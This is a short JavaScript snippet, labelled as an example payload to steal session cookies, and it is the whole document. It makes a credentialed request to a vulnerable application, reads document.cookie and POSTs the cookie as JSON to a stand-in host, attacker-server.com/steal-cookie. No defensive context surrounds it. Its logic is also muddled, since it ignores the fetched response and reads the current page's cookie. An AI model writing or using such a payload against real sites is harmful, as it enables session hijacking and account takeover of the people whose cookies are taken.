```javascript
// Example of a JavaScript payload to steal session cookies
fetch('http://vulnerable-application.com', {
    method: 'GET',
    credentials: 'include'
}).then(response => {
    return response.text();
}).then(data => {
    const cookie = document.cookie; // Access the session cookie
    fetch('http://attacker-server.com/steal-cookie', {
        method: 'POST',
        body: JSON.stringify({ cookie: cookie }),
        headers: {
            'Content-Type': 'application/json'
        }
    });
});
```